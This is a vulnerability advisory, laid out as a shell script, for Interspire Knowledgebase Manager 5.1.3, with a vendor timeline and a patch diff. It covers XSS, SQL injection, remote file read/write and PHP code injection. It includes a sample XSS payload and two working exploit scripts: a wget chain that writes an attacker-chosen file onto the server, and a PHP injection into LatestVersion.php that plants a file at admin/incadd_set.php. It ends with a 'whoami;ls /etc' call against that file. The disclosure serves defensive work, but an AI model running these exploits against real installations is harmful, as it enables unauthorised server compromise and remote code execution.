Interspire Knowledgebase Manager 5.1.3 Cross Site Scripting / SQL Injection

`#!/bin/sh  
#  
# - Interspire Knowledge Manager -  
#  
# ======================================================================  
# Table of Contents  
#  
# Affected Software....................................................1  
# Severity.............................................................2  
# Vendor's Description of Software.....................................3  
# Description of Vulnerability.........................................4  
# Solution.............................................................5  
# Time Table...........................................................6  
# Credits..............................................................7  
# Sample Exploit.....................................................8  
#  
# ======================================================================  
# 1) Affected Software  
#  
# * Interspire Knowledgebase Manager <= 5.1.3  
#  
# ======================================================================  
# 2) Severity  
#  
# Rating: Critical  
# Impact: Web server compromise, remote code injection  
# Where: Remote  
#  
# ======================================================================  
# 3) Vendor's Description of Software  
#  
# "Knowledge Management Software to Locate, Capture and Share Information  
With Your Team.  
# Interspire Knowledge Manager allows you to share information from your  
website or Intranet with  
# an enterprise-grade knowledge base, reducing customer support, improving  
staff productivity and  
# eliminating time wasted searching for information across disparate systems  
such as shared  
# folders and paper documents.  
# Share knowledge easily & securely  
# Already in use by over 2,000 small businesses, universities, non-profits  
and enterprise organizations"  
#  
# Product Link:  
# http://www.interspire.com/knowledgemanager/  
#  
# ======================================================================  
# 4) Description of Vulnerability  
#  
# Multiple vulnerabilities exist in the software with a range of impact.  
# Known vulnerabilities include:  
#  
# Information Disclosure:  
# Information disclosure of the server's $_SERVER['DOCUMENT_ROOT']  
# admin/de/dialog/media_manager.php: view source, roots["dRoot"] =  
<DOCUMENT_ROOT>  
# This can be used by an attacker to determine the server's root path from a  
relative path,  
# or from a root path to a web accessible path.  
# - no fix available.  
#  
# Cross Site Scripting  
# many XSS holes exist, here is a sample transient XSS hole, many more  
exist:  
# admin/de/colormenu.php?sp=f";alert('xss');a="  
# - fix: no fix available  
#  
# SQL Injection:  
# Nearly every query is vulnerable to SQL injection with PHP magic quotes  
# turned off. Input validation fails at many levels, so some SQL injection  
# may still be likely with magic quotes on.  
# - fix: turn on magic quotes  
#  
# Remote File Read:  
# The application blindly accepts user data, unfiltered and reads files from  
# the file system.  
# admin/de/dialog/file_manager.php?p=/file/to/read&w=1  
# - fix: vendor is recommending purchasing version 5.1.3  
#  
# Remote File Write:  
# The software has a "feature" that allows overwriting $_SESSION variables  
# with $_GET variables. Parts of the software that assume these variables  
# are secure, can then be exploited to write any file to the system by an  
# unauthenticated user, including PHP code.  
# example POC code:  
#  
# #!/bin/sh  
# echo "$0 <target_url> <relative_path_from_admin_dir> <file_name>  
<content_url>  
# example: $0 http://target.com/knowledge_base ../../../ file.php  
http://source  
# if kb is installed at knowledge_base, then the file: file.php will be  
# created in the base application directory from the content at  
http://source  
# "  
# sessionUrl=$1'/admin/de/dialog/file_manager.php'  
# uploadUrl=$1'/admin/de/dialog/callback.snipshot.php'  
# wget -O r1 --save-cookies tmp.cookies --keep-session-cookies  
"$sessionUrl?userdocroot=$2&imgDir=&obj=1"  
# echo "session created, setting file name $2$3"  
# wget -O r2 --keep-session-cookies --load-cookies tmp.cookies  
"$uploadUrl?action=step1&source_image=name&save_file_as=$3"  
# echo "upload content from: $4 ..."  
# wget -O r3 --keep-session-cookies --load-cookies tmp.cookies  
"$uploadUrl?action=step2&source_image=name&save_file_as=$3&snipshot_output=$4"  
# echo "file created test access to the script at: $1/admin/de/dialog/$2$3";  
#  
# - fix: vendor is recommending purchasing version 5.1.3  
#  
# PHP code Injection:  
# The software has a feature that connects to Interspire to find the latest  
# version of the software. This is then cached in a PHP file. The version  
# number is taken from a get variable and written directly into a PHP file.  
# This allows anyone with web access to the software to upload code  
# and execute it remotely.  
# - fix: vendor has said that a fix will be available for purchase during  
the next release cycle.  
# An alternate patch is available in this advisory.  
#  
# ======================================================================  
# 5) Solution  
#  
# Remote file reads, writes and code injection can be fixed by purchasing  
version 5.1.3 and  
# applying the included patch to the PHP code. The other vulnerabilities  
are hopefully addressed  
# in the next release cycle.  
#  
# file to patch: admin/remote.php  
#  
# ======================================================================  
# 6) Time Table  
#  
# 1/15/2009 - Vendor notified.  
# 2/02/2010 - Vendor responded that vulnerability would be addressed in next  
software version and  
# no security patch would be made available to customers.  
# 2/03/2010 - Non-vendor patch created to solve remote code injection  
problem.  
# ======================================================================  
# 7) Credits Cory Marsh  
#  
# ======================================================================  
# 8) context sensitive patch diff admin/remote.php:  
#  
*** remote.orig.php 2010-02-03 08:44:19.116062114 -0000  
--- remote.php 2010-02-03 08:49:22.086078275 -0000  
***************  
*** 28,34 ****  
if (isset($_REQUEST['type'])) {  
switch ($_REQUEST['type']) {  
case 'saveVersion':  
! if(!isset($_REQUEST['v'])) {  
exit;  
}  
  
--- 28,34 ----  
if (isset($_REQUEST['type'])) {  
switch ($_REQUEST['type']) {  
case 'saveVersion':  
! if(!isset($_REQUEST['v']) ||  
!preg_match('/^[0-9a-zA-Z\.]{1,25}$/', $_REQUEST['v']) {  
exit;  
}  
#  
# ======================================================================  
# 8) Sample exploit, use this to verify the patch.  
#  
# This POC example can be used to verify vulnerable software, and then  
verify that the patch  
# worked correctly. This script will modify the admin/tmp/LatestVersion.php  
script so that  
# in addition to defining the latest software version, it will also write a  
file to the filesystem passed  
# as a POST paramater "f", with the contents of POST parameter "u". It will  
then use this  
# LatestVersion.php script to create a new file /admin/incadd_set.php that  
echo's out the GET  
# parameter "cmd". After applying the supplied patch, this exploit script  
should no longer work  
#  
echo "usage: $0 <remote_url_to_interspire_base>  
example: $0 http://www.remotehost/help  
";  
vulnerable="$1/admin/remote.php"  
compromised="$1/admin/tmp/LatestVersion.php";  
echo  
"type=saveVersion&v=5.1.3','lastCheck'=>time());if(isset(\$_POST['f']))file_put_contents(\$_POST['f'],stripslashes(\$_POST['u']));\$a=array('"  
> injection.txt  
echo "f=../incadd_set.php&u=<pre><?echo(\$_GET['cmd']);" > code.txt  
wget --post-file=injection.txt $vulnerable > /dev/null  
wget --post-file=code.txt $compromised > /dev/null  
echo "code installed at: $1/admin/incadd_set.php?cmd=whoami;ls /etc"  
`